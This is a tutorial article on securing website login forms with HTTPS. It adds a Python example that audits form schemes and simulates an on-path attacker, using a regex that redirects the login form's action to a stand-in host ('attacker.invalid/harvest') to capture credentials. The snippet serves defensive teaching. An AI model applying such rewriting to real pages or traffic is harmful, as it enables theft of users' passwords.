If you are an expert in web development and already know everything about SSL certificates, you do not need this article. If, on the other hand, you have only basic knowledge and do not know how to secure a login form or other critical information on a website, this article is for you. Learn everything about SSL certificates.
Web developers worth their salt know that when a user logs in to a site that is not backed by an SSL certificate, the username and password travel in plain text and can be read by anyone positioned on the network path between the browser and the server.
Although the vast majority of businesses do protect their login and password fields with an SSL certificate, they often use it incorrectly. The truth is that building a secure login form is not as simple as it looks, and there are several ways to get it wrong. There are good and bad ways to secure a website's login form with an SSL certificate.
When an SSL certificate is not used, an attacker has several ways to break into user accounts. Sniffing the unencrypted traffic yields the usernames and passwords of many users; the attacker can then impersonate those users and inflict a great deal of financial damage by purchasing products, transferring money, breaking into email accounts, and so on.
More dangerous still, many users reuse on their online accounts the same password they use for their bank accounts. A hacker who captures a password on your site can therefore break into financial accounts as well, which raises a storm of problems for your site, because the users will blame you for the breach.
They would have a point: the responsibility for protecting their usernames and passwords lies with you, even if your own site is not one that needs to be highly secured (a forum, for example).
Secure Login Form Mistakes
Magento developers, and web developers in general, often make one of the following two mistakes when creating a login form:
- Securing the login form with SSL incorrectly, typically by placing a form that submits over HTTPS on a page that is itself served over plain HTTP
- Not securing the login form at all
The most common mistake is not securing the login form at all. It is absolutely indispensable that you secure the login page with an SSL certificate, or use one of the alternative authentication methods mentioned below, in order to protect the usernames and passwords of your users.
Why You Shouldn’t Place an HTTPS Login Form on an Unsecured HTTP Page
A site backed by an SSL certificate that receives a lot of traffic needs more processing power for the encryption. So an option that many companies pursued was to place the login form on an HTTP page (for example, the homepage) and have the form submit to an HTTPS page. The theory was that this would still encrypt the login information at the moment it is submitted. We advise against doing this, for the following three reasons.
One, the user has no way of knowing that the login information will be encrypted unless he or she reads the site's source code.
It has become customary for web users to look for the "golden lock" icon, or even the "green bar" shown for extended validation certificates, to reassure them that the session is encrypted before they type their login details into a website. These visual signals tell them that the connection is encrypted and that the certificate was issued for the domain in the address bar. Removing them, even though the submission itself is encrypted, makes the form look insecure.
Two, the form's action can easily be changed by an attacker. Because the page that carries the form is delivered over HTTP, anyone who can intercept it (on public Wi-Fi, at a compromised router, at an ISP) can rewrite the HTML before it reaches the browser, point the form at a server they control, or inject a script that copies the keystrokes. The HTTPS action is never used, and the user has no idea that the username and password went to the attacker.
A third reason is that a login form hosted on an HTTP URL triggers security warnings in Google Chrome from January 2017. Google is obliging site owners to host the login form on an HTTPS URL to avoid the "Not secure" warning that Chrome 56 shows on any HTTP page with a password or credit card field; since Chrome 68 (July 2018) every HTTP page is marked "Not secure", whether or not it holds a form.
The move is unsurprising, considering that Google has granted a ranking boost to HTTPS URLs and has openly spoken in favor of hosting login pages on HTTPS for a while now.
Secure HTTPS Login on PayPal
Take PayPal as an example. There are two options for letting users enter their login information securely:
- Create a separate login page that is only reachable over HTTPS and submits over HTTPS.
- Permanently enforce HTTPS on the homepage that carries the login form, redirecting every HTTP request to the HTTPS URL. In this case the user is more likely to bookmark the HTTPS homepage than a separate login page.
The OWASP SSL Best Practices state it clearly: the page that displays the login form must be served over HTTPS, and the page the form submits to must be an HTTPS page as well.
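To make reasons one and two above, and the layout OWASP asks for, concrete, here is an added example (not code from the original article, PayPal, OWASP or any vendor it mentions) that audits the login forms on a page by the scheme of the page and the scheme of each form's action, and then simulates an on-path attacker rewriting the form action in an HTTP response. The page URLs, the hostnames (example.com, attacker.invalid) and the HTML are constructed for the demo, so it runs offline with only the Python standard library.

```python
"""Audit a login form for the HTTP/HTTPS layouts discussed above.

Added example; not code from the original article. The URLs, hostnames and
HTML below are constructed for the demo (example.com and attacker.invalid are
reserved names that resolve to nothing), so everything runs offline.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> on the page and note whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}  # boolean attributes arrive as None
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if attrs.get("type", "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(page_url, html):
    """Classify each password form on a page by how the credentials travel.

    Returns a list of (verdict, resolved_action_url) tuples. Verdicts:
      unprotected  HTTP page submitting over HTTP (credentials in clear text)
      mixed        HTTP page submitting to HTTPS (the layout the article warns about)
      downgrade    HTTPS page submitting to HTTP
      cross-host   HTTPS page submitting to HTTPS on another host (check it is intended)
      ok           HTTPS page submitting to HTTPS on the same host (the OWASP layout)
    """
    collector = _FormCollector()
    collector.feed(html)
    page = urlsplit(page_url)
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue  # a search box or newsletter form carries no credentials
        action_url = urljoin(page_url, form["action"])  # relative actions inherit the page scheme
        action = urlsplit(action_url)
        if page.scheme != "https":
            verdict = "mixed" if action.scheme == "https" else "unprotected"
        elif action.scheme != "https":
            verdict = "downgrade"
        elif action.hostname != page.hostname:
            verdict = "cross-host"
        else:
            verdict = "ok"
        findings.append((verdict, action_url))
    return findings


def tamper_in_transit(html, attacker_origin="http://attacker.invalid"):
    """Simulate an on-path attacker rewriting a page that was served over plain HTTP.

    An HTTP response has no integrity protection, so anything between the server
    and the browser can edit it. Here only the form action is redirected to the
    attacker's host; injecting a keystroke-logging script would be just as easy
    and just as invisible to the user.
    """
    return re.sub(r'action="https://[^"]*"', f'action="{attacker_origin}/harvest"', html)


# Constructed sample page: a login form that submits over HTTPS, plus a search form.
LOGIN_FORM = (
    '<html><body><h1>Welcome</h1>'
    '<form action="https://www.example.com/login" method="post">'
    '<input type="text" name="username">'
    '<input type="password" name="password">'
    '<input type="submit" value="Log in"></form>'
    '<form action="/search" method="get"><input type="text" name="q"></form>'
    '</body></html>'
)

if __name__ == "__main__":
    # Same HTML, served over HTTP (the "mixed" mistake) and over HTTPS (the OWASP layout).
    for url in ("http://www.example.com/", "https://www.example.com/"):
        print(url, audit_login_forms(url, LOGIN_FORM))
    # What the browser sees after an on-path rewrite of the HTTP response.
    print("tampered", audit_login_forms("http://www.example.com/", tamper_in_transit(LOGIN_FORM)))
```

The same HTML is classified "mixed" when the page URL is HTTP and "ok" when it is HTTPS, which is the whole point of the two options above: what matters is the scheme of the page that delivers the form, not just the scheme in the action attribute. After the simulated rewrite the form posts to attacker.invalid over plain HTTP, and nothing on the original HTTP page could have prevented it.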
Alternative Options for Establishing Secure Login Form
What if you would rather not enforce HTTPS on the login page or buy an SSL certificate? There are several options that let you authenticate users by other means. Keep in mind, though, that even when a third party checks the password, your site still issues a session cookie once the user is logged in; if the rest of your site runs over HTTP, that cookie can be intercepted and the account hijacked, so these options reduce rather than remove the need for HTTPS.
By using Facebook Connect (now called Facebook Login), you let Facebook handle the authentication of your users. The user logs in on the Facebook site, which is secured with SSL, and it is convenient for him or her too, since the user only has to remember a Facebook username and password to access your site.
Much like Facebook Connect, OpenID lets users authenticate on a third-party site. Though not as popular as Facebook, several OpenID providers exist; the original OpenID protocol has since been superseded by OpenID Connect, which most providers now implement.
Twitter also makes it easy for your users to log in securely to your site with their Twitter accounts.
Using an SSL certificate to secure your login form is just one aspect of securing your site as a whole. When you skip it, however, you open your site to the very real possibility of interception and phishing attacks. By using the form properly, you invite your users to trust you and your brand when they submit their sensitive information.
Denise Recalde is a Senior Content Writer at Day Translations, a human translation services company. A seasoned writer and editor with eleven years of experience under her belt, she is a bona fide wordsmith who loves playing with the written word creatively and always takes care to lend a certain hue of snap and color to her drafts.